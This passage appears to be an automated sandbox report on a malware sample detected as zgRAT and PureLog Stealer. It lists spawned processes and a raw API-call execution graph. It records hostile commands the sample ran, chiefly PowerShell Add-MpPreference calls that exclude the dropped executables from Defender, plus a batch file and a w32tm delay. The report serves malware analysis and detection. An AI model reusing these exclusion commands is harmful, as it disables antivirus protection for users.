                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft office\Office16\dasHost.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:36
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:37
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:38
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Panther\UnattendGC\TnsvMjfQwJOjpYJzqEDNh.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:39
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:40
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ComProviderDriversavescrt\ComrefNetsvc.exe'
                                                                                Imagebase:0x7ff788560000
                                                                                File size:452'608 bytes
                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:41
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:42
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:43
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:44
                                                                                Start time:17:32:29
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:45
                                                                                Start time:17:32:30
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\M1cWFCMEcy.bat"
                                                                                Imagebase:0x7ff72c350000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:46
                                                                                Start time:17:32:30
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff7699e0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:47
                                                                                Start time:17:32:32
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\chcp.com
                                                                                Wow64 process (32bit):false
                                                                                Commandline:chcp 65001
                                                                                Imagebase:0x7ff7dd810000
                                                                                File size:14'848 bytes
                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:48
                                                                                Start time:17:32:38
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\w32tm.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                Imagebase:0x7ff7db370000
                                                                                File size:108'032 bytes
                                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:49
                                                                                Start time:17:32:43
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                Imagebase:0x7ff693ab0000
                                                                                File size:496'640 bytes
                                                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:50
                                                                                Start time:17:32:46
                                                                                Start date:11/01/2025
                                                                                Path:C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe"
                                                                                Imagebase:0xb0000
                                                                                File size:2'072'064 bytes
                                                                                MD5 hash:7A6B9E23ECCB90B36EB6A4FE87427D41
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 83%, ReversingLabs
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:51
                                                                                Start time:17:32:50
                                                                                Start date:11/01/2025
                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                Imagebase:0x7ff6eef20000
                                                                                File size:55'320 bytes
                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Has exited:false

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:9.8%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:10.1%
                                                                                  Total number of Nodes:1510
                                                                                  Total number of Limit Nodes:28
                                                                                  execution_graph 25323 29b4ae 27 API calls CatchGuardHandler 25287 271025 29 API calls 25289 29f421 21 API calls __vsnwprintf_l 25349 28c220 93 API calls _swprintf 25324 28f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25366 28ff30 LocalFree 23413 29bb30 23414 29bb39 23413->23414 23415 29bb42 23413->23415 23417 29ba27 23414->23417 23437 2997e5 GetLastError 23417->23437 23419 29ba34 23457 29bb4e 23419->23457 23421 29ba3c 23466 29b7bb 23421->23466 23424 29ba53 23424->23415 23427 29ba96 23491 298dcc 23427->23491 23431 29ba91 23490 2991a8 20 API calls __dosmaperr 23431->23490 23433 29bada 23433->23427 23497 29b691 26 API calls 23433->23497 23434 29baae 23434->23433 23435 298dcc _free 20 API calls 23434->23435 23435->23433 23438 2997fb 23437->23438 23439 299801 23437->23439 23498 29ae5b 11 API calls 2 library calls 23438->23498 23443 299850 SetLastError 23439->23443 23499 29b136 23439->23499 23443->23419 23445 298dcc _free 20 API calls 23447 299821 23445->23447 23446 299830 23448 29981b 23446->23448 23449 299837 23446->23449 23450 29985c SetLastError 23447->23450 23448->23445 23507 299649 20 API calls _unexpected 23449->23507 23508 298d24 38 API calls _abort 23450->23508 23453 299842 23455 298dcc _free 20 API calls 23453->23455 23456 299849 23455->23456 23456->23443 23456->23450 23458 29bb5a __FrameHandler3::FrameUnwindToState 23457->23458 23459 2997e5 _unexpected 38 API calls 23458->23459 23461 29bb64 23459->23461 23464 29bbe8 _abort 23461->23464 23465 298dcc _free 20 API calls 23461->23465 23511 298d24 38 API calls _abort 23461->23511 23512 29ac31 EnterCriticalSection 23461->23512 23513 29bbdf LeaveCriticalSection _abort 23461->23513 23464->23421 23465->23461 23514 294636 23466->23514 23469 29b7dc GetOEMCP 23471 29b805 23469->23471 23470 29b7ee 23470->23471 23472 29b7f3 GetACP 23470->23472 23471->23424 23473 298e06 23471->23473 23472->23471 23474 298e44 23473->23474 23478 298e14 _unexpected 23473->23478 23525 2991a8 20 API calls __dosmaperr 23474->23525 23476 298e2f RtlAllocateHeap 23477 298e42 23476->23477 23476->23478 23477->23427 23480 29bbf0 23477->23480 23478->23474 23478->23476 23524 297a5e 7 API calls 2 library calls 23478->23524 23481 29b7bb 40 API calls 23480->23481 23482 29bc0f 23481->23482 23484 29bc60 IsValidCodePage 23482->23484 23487 29bc16 23482->23487 23488 29bc85 _abort 23482->23488 23486 29bc72 GetCPInfo 23484->23486 23484->23487 23485 29ba89 23485->23431 23485->23434 23486->23487 23486->23488 23536 28fbbc 23487->23536 23526 29b893 GetCPInfo 23488->23526 23490->23427 23492 298e00 _free 23491->23492 23493 298dd7 RtlFreeHeap 23491->23493 23492->23424 23493->23492 23494 298dec 23493->23494 23617 2991a8 20 API calls __dosmaperr 23494->23617 23496 298df2 GetLastError 23496->23492 23497->23427 23498->23439 23504 29b143 _unexpected 23499->23504 23500 29b183 23510 2991a8 20 API calls __dosmaperr 23500->23510 23501 29b16e RtlAllocateHeap 23502 299813 23501->23502 23501->23504 23502->23448 23506 29aeb1 11 API calls 2 library calls 23502->23506 23504->23500 23504->23501 23509 297a5e 7 API calls 2 library calls 23504->23509 23506->23446 23507->23453 23509->23504 23510->23502 23512->23461 23513->23461 23515 294653 23514->23515 23521 294649 23514->23521 23516 2997e5 _unexpected 38 API calls 23515->23516 23515->23521 23517 294674 23516->23517 23522 29993a 38 API calls __cftof 23517->23522 23519 29468d 23523 299967 38 API calls __cftof 23519->23523 23521->23469 23521->23470 23522->23519 23523->23521 23524->23478 23525->23477 23527 29b977 23526->23527 23532 29b8cd 23526->23532 23529 28fbbc CatchGuardHandler 5 API calls 23527->23529 23531 29ba23 23529->23531 23531->23487 23543 29c988 23532->23543 23535 29ab78 __vsnwprintf_l 43 API calls 23535->23527 23537 28fbc4 23536->23537 23538 28fbc5 IsProcessorFeaturePresent 23536->23538 23537->23485 23540 28fc07 23538->23540 23616 28fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23540->23616 23542 28fcea 23542->23485 23544 294636 __cftof 38 API calls 23543->23544 23545 29c9a8 MultiByteToWideChar 23544->23545 23547 29c9e6 23545->23547 23555 29ca7e 23545->23555 23549 298e06 __vsnwprintf_l 21 API calls 23547->23549 23552 29ca07 _abort __vsnwprintf_l 23547->23552 23548 28fbbc CatchGuardHandler 5 API calls 23550 29b92e 23548->23550 23549->23552 23557 29ab78 23550->23557 23551 29ca78 23562 29abc3 20 API calls _free 23551->23562 23552->23551 23554 29ca4c MultiByteToWideChar 23552->23554 23554->23551 23556 29ca68 GetStringTypeW 23554->23556 23555->23548 23556->23551 23558 294636 __cftof 38 API calls 23557->23558 23559 29ab8b 23558->23559 23563 29a95b 23559->23563 23562->23555 23564 29a976 __vsnwprintf_l 23563->23564 23565 29a99c MultiByteToWideChar 23564->23565 23568 29a9c6 23565->23568 23577 29ab50 23565->23577 23566 28fbbc CatchGuardHandler 5 API calls 23567 29ab63 23566->23567 23567->23535 23569 29a9e7 __vsnwprintf_l 23568->23569 23570 298e06 __vsnwprintf_l 21 API calls 23568->23570 23571 29aa9c 23569->23571 23572 29aa30 MultiByteToWideChar 23569->23572 23570->23569 23599 29abc3 20 API calls _free 23571->23599 23572->23571 23573 29aa49 23572->23573 23590 29af6c 23573->23590 23577->23566 23578 29aaab 23582 298e06 __vsnwprintf_l 21 API calls 23578->23582 23585 29aacc __vsnwprintf_l 23578->23585 23579 29aa73 23579->23571 23581 29af6c __vsnwprintf_l 11 API calls 23579->23581 23580 29ab41 23598 29abc3 20 API calls _free 23580->23598 23581->23571 23582->23585 23583 29af6c __vsnwprintf_l 11 API calls 23586 29ab20 23583->23586 23585->23580 23585->23583 23586->23580 23587 29ab2f WideCharToMultiByte 23586->23587 23587->23580 23588 29ab6f 23587->23588 23600 29abc3 20 API calls _free 23588->23600 23601 29ac98 23590->23601 23594 29af9c 23596 28fbbc CatchGuardHandler 5 API calls 23594->23596 23595 29afdc LCMapStringW 23595->23594 23597 29aa60 23596->23597 23597->23571 23597->23578 23597->23579 23598->23571 23599->23577 23600->23571 23602 29acc8 23601->23602 23603 29acc4 23601->23603 23602->23594 23608 29aff4 10 API calls 3 library calls 23602->23608 23603->23602 23607 29ace8 23603->23607 23609 29ad34 23603->23609 23605 29acf4 GetProcAddress 23606 29ad04 _unexpected 23605->23606 23606->23602 23607->23602 23607->23605 23608->23595 23610 29ad55 LoadLibraryExW 23609->23610 23615 29ad4a 23609->23615 23611 29ad72 GetLastError 23610->23611 23614 29ad8a 23610->23614 23613 29ad7d LoadLibraryExW 23611->23613 23611->23614 23612 29ada1 FreeLibrary 23612->23615 23613->23614 23614->23612 23614->23615 23615->23603 23616->23542 23617->23496 25292 29c030 GetProcessHeap 25293 28a400 GdipDisposeImage GdipFree 25350 28d600 70 API calls 25294 296000 QueryPerformanceFrequency QueryPerformanceCounter 25327 292900 6 API calls 4 library calls 25351 29f200 51 API calls 25367 29a700 21 API calls 25369 271710 86 API calls 25329 28ad10 73 API calls 25352 298268 55 API calls _free 25298 28c793 107 API calls 5 library calls 25370 297f6e 52 API calls 2 library calls 25299 271075 84 API calls 25143 279a74 25146 279a7e 25143->25146 25144 279b9d SetFilePointer 25145 279bb6 GetLastError 25144->25145 25149 279ab1 25144->25149 25145->25149 25146->25144 25147 27981a 79 API calls 25146->25147 25148 279b79 25146->25148 25146->25149 25147->25148 25148->25144 25371 271f72 128 API calls __EH_prolog 25301 28a070 10 API calls 25353 28b270 99 API calls 25176 279f7a 25177 279f8f 25176->25177 25178 279f88 25176->25178 25179 279f9c GetStdHandle 25177->25179 25186 279fab 25177->25186 25179->25186 25180 27a003 WriteFile 25180->25186 25181 279fd4 WriteFile 25182 279fcf 25181->25182 25181->25186 25182->25181 25182->25186 25184 27a095 25188 276e98 77 API calls 25184->25188 25186->25178 25186->25180 25186->25181 25186->25182 25186->25184 25187 276baa 78 API calls 25186->25187 25187->25186 25188->25178 25304 28a440 GdipCloneImage GdipAlloc 25354 293a40 5 API calls CatchGuardHandler 25374 2a1f40 CloseHandle 25207 28cd58 25209 28ce22 25207->25209 25214 28cd7b _wcschr 25207->25214 25208 28b314 ExpandEnvironmentStringsW 25224 28c793 _wcslen _wcsrchr 25208->25224 25209->25224 25235 28d78f 25209->25235 25211 28d40a 25212 281fbb CompareStringW 25212->25214 25214->25209 25214->25212 25215 28ca67 SetWindowTextW 25215->25224 25218 293e3e 22 API calls 25218->25224 25220 28c855 SetFileAttributesW 25222 28c90f GetFileAttributesW 25220->25222 25233 28c86f _abort _wcslen 25220->25233 25222->25224 25225 28c921 DeleteFileW 25222->25225 25224->25208 25224->25211 25224->25215 25224->25218 25224->25220 25227 28cc31 GetDlgItem SetWindowTextW SendMessageW 25224->25227 25229 28cc71 SendMessageW 25224->25229 25234 281fbb CompareStringW 25224->25234 25257 28a64d GetCurrentDirectoryW 25224->25257 25259 27a5d1 6 API calls 25224->25259 25260 27a55a FindClose 25224->25260 25261 28b48e 76 API calls 2 library calls 25224->25261 25225->25224 25226 28c932 25225->25226 25228 274092 _swprintf 51 API calls 25226->25228 25227->25224 25230 28c952 GetFileAttributesW 25228->25230 25229->25224 25230->25226 25231 28c967 MoveFileW 25230->25231 25231->25224 25232 28c97f MoveFileExW 25231->25232 25232->25224 25233->25222 25233->25224 25258 27b991 51 API calls 3 library calls 25233->25258 25234->25224 25237 28d799 _abort _wcslen 25235->25237 25236 28d9e7 25236->25224 25237->25236 25238 28d9c0 25237->25238 25239 28d8a5 25237->25239 25262 281fbb CompareStringW 25237->25262 25238->25236 25243 28d9de ShowWindow 25238->25243 25240 27a231 3 API calls 25239->25240 25242 28d8ba 25240->25242 25247 28d8d1 25242->25247 25263 27b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 25242->25263 25243->25236 25245 28d925 25264 28dc3b 6 API calls 25245->25264 25246 28d97b CloseHandle 25248 28d994 25246->25248 25249 28d989 25246->25249 25247->25236 25247->25245 25247->25246 25250 28d91b ShowWindow 25247->25250 25248->25238 25265 281fbb CompareStringW 25249->25265 25250->25245 25253 28d93d 25253->25246 25254 28d950 GetExitCodeProcess 25253->25254 25254->25246 25255 28d963 25254->25255 25255->25246 25257->25224 25258->25233 25259->25224 25260->25224 25261->25224 25262->25239 25263->25247 25264->25253 25265->25248 25305 28e455 14 API calls ___delayLoadHelper2@8 25375 28f3a0 27 API calls 25308 29a4a0 71 API calls _free 25309 28dca1 DialogBoxParamW 25310 2a08a0 IsProcessorFeaturePresent 25376 276faa 111 API calls 3 library calls 25336 28eda7 48 API calls _unexpected 25377 281bbd GetCPInfo IsDBCSLeadByte 25337 28b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23355 28e5b1 23356 28e578 23355->23356 23358 28e85d 23356->23358 23384 28e5bb 23358->23384 23360 28e86d 23361 28e8ca 23360->23361 23369 28e8ee 23360->23369 23362 28e7fb DloadReleaseSectionWriteAccess 6 API calls 23361->23362 23363 28e8d5 RaiseException 23362->23363 23378 28eac3 23363->23378 23364 28e966 LoadLibraryExA 23365 28e979 GetLastError 23364->23365 23366 28e9c7 23364->23366 23372 28e9a2 23365->23372 23377 28e98c 23365->23377 23370 28e9d9 23366->23370 23371 28e9d2 FreeLibrary 23366->23371 23367 28ea95 23393 28e7fb 23367->23393 23368 28ea37 GetProcAddress 23368->23367 23374 28ea47 GetLastError 23368->23374 23369->23364 23369->23366 23369->23367 23369->23370 23370->23367 23370->23368 23371->23370 23373 28e7fb DloadReleaseSectionWriteAccess 6 API calls 23372->23373 23375 28e9ad RaiseException 23373->23375 23380 28ea5a 23374->23380 23375->23378 23377->23366 23377->23372 23378->23356 23379 28e7fb DloadReleaseSectionWriteAccess 6 API calls 23381 28ea7b RaiseException 23379->23381 23380->23367 23380->23379 23382 28e5bb ___delayLoadHelper2@8 6 API calls 23381->23382 23383 28ea92 23382->23383 23383->23367 23385 28e5ed 23384->23385 23386 28e5c7 23384->23386 23385->23360 23401 28e664 23386->23401 23388 28e5cc 23389 28e5e8 23388->23389 23404 28e78d 23388->23404 23409 28e5ee GetModuleHandleW GetProcAddress GetProcAddress 23389->23409 23392 28e836 23392->23360 23394 28e80d 23393->23394 23395 28e82f 23393->23395 23396 28e664 DloadReleaseSectionWriteAccess 3 API calls 23394->23396 23395->23378 23397 28e812 23396->23397 23398 28e82a 23397->23398 23399 28e78d DloadProtectSection 3 API calls 23397->23399 23412 28e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23398->23412 23399->23398 23410 28e5ee GetModuleHandleW GetProcAddress GetProcAddress 23401->23410 23403 28e669 23403->23388 23406 28e7a2 DloadProtectSection 23404->23406 23405 28e7a8 23405->23389 23406->23405 23407 28e7dd VirtualProtect 23406->23407 23411 28e6a3 VirtualQuery GetSystemInfo 23406->23411 23407->23405 23409->23392 23410->23403 23411->23407 23412->23395 23621 28f3b2 23622 28f3be __FrameHandler3::FrameUnwindToState 23621->23622 23653 28eed7 23622->23653 23624 28f3c5 23625 28f518 23624->23625 23628 28f3ef 23624->23628 23726 28f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 23625->23726 23627 28f51f 23719 297f58 23627->23719 23641 28f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23628->23641 23664 298aed 23628->23664 23635 28f40e 23637 28f48f 23672 28f953 GetStartupInfoW _abort 23637->23672 23639 28f495 23673 298a3e 51 API calls 23639->23673 23641->23637 23722 297af4 38 API calls 2 library calls 23641->23722 23642 28f49d 23674 28df1e 23642->23674 23647 28f4b1 23647->23627 23648 28f4b5 23647->23648 23649 28f4be 23648->23649 23724 297efb 28 API calls _abort 23648->23724 23725 28f048 12 API calls ___scrt_uninitialize_crt 23649->23725 23652 28f4c6 23652->23635 23654 28eee0 23653->23654 23728 28f654 IsProcessorFeaturePresent 23654->23728 23656 28eeec 23729 292a5e 23656->23729 23658 28eef1 23659 28eef5 23658->23659 23737 298977 23658->23737 23659->23624 23662 28ef0c 23662->23624 23665 298b04 23664->23665 23666 28fbbc CatchGuardHandler 5 API calls 23665->23666 23667 28f408 23666->23667 23667->23635 23668 298a91 23667->23668 23669 298ac0 23668->23669 23670 28fbbc CatchGuardHandler 5 API calls 23669->23670 23671 298ae9 23670->23671 23671->23641 23672->23639 23673->23642 23837 280863 23674->23837 23678 28df3d 23886 28ac16 23678->23886 23680 28df46 _abort 23681 28df59 GetCommandLineW 23680->23681 23682 28df68 23681->23682 23683 28dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23681->23683 23890 28c5c4 23682->23890 23901 274092 23683->23901 23689 28dfe0 23895 28dbde 23689->23895 23690 28df76 OpenFileMappingW 23692 28df8f MapViewOfFile 23690->23692 23693 28dfd6 CloseHandle 23690->23693 23696 28dfcd UnmapViewOfFile 23692->23696 23697 28dfa0 __InternalCxxFrameHandler 23692->23697 23693->23683 23696->23693 23701 28dbde 2 API calls 23697->23701 23703 28dfbc 23701->23703 23702 2890b7 8 API calls 23704 28e0aa DialogBoxParamW 23702->23704 23703->23696 23705 28e0e4 23704->23705 23706 28e0fd 23705->23706 23707 28e0f6 Sleep 23705->23707 23710 28e10b 23706->23710 23934 28ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 23706->23934 23707->23706 23709 28e12a DeleteObject 23711 28e13f DeleteObject 23709->23711 23712 28e146 23709->23712 23710->23709 23711->23712 23713 28e177 23712->23713 23717 28e189 23712->23717 23935 28dc3b 6 API calls 23713->23935 23715 28e17d CloseHandle 23715->23717 23931 28ac7c 23717->23931 23718 28e1c3 23723 28f993 GetModuleHandleW 23718->23723 24184 297cd5 23719->24184 23722->23637 23723->23647 23724->23649 23725->23652 23726->23627 23728->23656 23741 293b07 23729->23741 23733 292a6f 23734 292a7a 23733->23734 23755 293b43 DeleteCriticalSection 23733->23755 23734->23658 23736 292a67 23736->23658 23784 29c05a 23737->23784 23740 292a7d 7 API calls 2 library calls 23740->23659 23742 293b10 23741->23742 23744 293b39 23742->23744 23745 292a63 23742->23745 23756 293d46 23742->23756 23761 293b43 DeleteCriticalSection 23744->23761 23745->23736 23747 292b8c 23745->23747 23777 293c57 23747->23777 23750 292ba1 23750->23733 23752 292baf 23753 292bbc 23752->23753 23783 292bbf 6 API calls ___vcrt_FlsFree 23752->23783 23753->23733 23755->23736 23762 293c0d 23756->23762 23759 293d7e InitializeCriticalSectionAndSpinCount 23760 293d69 23759->23760 23760->23742 23761->23745 23763 293c26 23762->23763 23764 293c4f 23762->23764 23763->23764 23769 293b72 23763->23769 23764->23759 23764->23760 23767 293c3b GetProcAddress 23767->23764 23768 293c49 23767->23768 23768->23764 23775 293b7e ___vcrt_FlsSetValue 23769->23775 23770 293bf3 23770->23764 23770->23767 23771 293b95 LoadLibraryExW 23772 293bfa 23771->23772 23773 293bb3 GetLastError 23771->23773 23772->23770 23774 293c02 FreeLibrary 23772->23774 23773->23775 23774->23770 23775->23770 23775->23771 23776 293bd5 LoadLibraryExW 23775->23776 23776->23772 23776->23775 23778 293c0d ___vcrt_FlsSetValue 5 API calls 23777->23778 23779 293c71 23778->23779 23780 293c8a TlsAlloc 23779->23780 23781 292b96 23779->23781 23781->23750 23782 293d08 6 API calls ___vcrt_FlsSetValue 23781->23782 23782->23752 23783->23750 23787 29c077 23784->23787 23788 29c073 23784->23788 23785 28fbbc CatchGuardHandler 5 API calls 23786 28eefe 23785->23786 23786->23662 23786->23740 23787->23788 23790 29a6a0 23787->23790 23788->23785 23791 29a6ac __FrameHandler3::FrameUnwindToState 23790->23791 23802 29ac31 EnterCriticalSection 23791->23802 23793 29a6b3 23803 29c528 23793->23803 23795 29a6c2 23796 29a6d1 23795->23796 23816 29a529 29 API calls 23795->23816 23818 29a6ed LeaveCriticalSection _abort 23796->23818 23799 29a6e2 _abort 23799->23787 23800 29a6cc 23817 29a5df GetStdHandle GetFileType 23800->23817 23802->23793 23804 29c534 __FrameHandler3::FrameUnwindToState 23803->23804 23805 29c558 23804->23805 23806 29c541 23804->23806 23819 29ac31 EnterCriticalSection 23805->23819 23827 2991a8 20 API calls __dosmaperr 23806->23827 23809 29c546 23828 299087 26 API calls __cftof 23809->23828 23811 29c550 _abort 23811->23795 23812 29c590 23829 29c5b7 LeaveCriticalSection _abort 23812->23829 23814 29c564 23814->23812 23820 29c479 23814->23820 23816->23800 23817->23796 23818->23799 23819->23814 23821 29b136 _unexpected 20 API calls 23820->23821 23822 29c48b 23821->23822 23826 29c498 23822->23826 23830 29af0a 23822->23830 23823 298dcc _free 20 API calls 23824 29c4ea 23823->23824 23824->23814 23826->23823 23827->23809 23828->23811 23829->23811 23831 29ac98 _unexpected 5 API calls 23830->23831 23832 29af31 23831->23832 23833 29af3a 23832->23833 23834 29af4f InitializeCriticalSectionAndSpinCount 23832->23834 23835 28fbbc CatchGuardHandler 5 API calls 23833->23835 23834->23833 23836 29af66 23835->23836 23836->23822 23936 28ec50 23837->23936 23840 280888 GetProcAddress 23842 2808b9 GetProcAddress 23840->23842 23843 2808a1 23840->23843 23841 2808e7 23844 280c14 GetModuleFileNameW 23841->23844 23947 2975fb 42 API calls __vsnwprintf_l 23841->23947 23845 2808cb 23842->23845 23843->23842 23853 280c32 23844->23853 23845->23841 23847 280b54 23847->23844 23848 280b5f GetModuleFileNameW CreateFileW 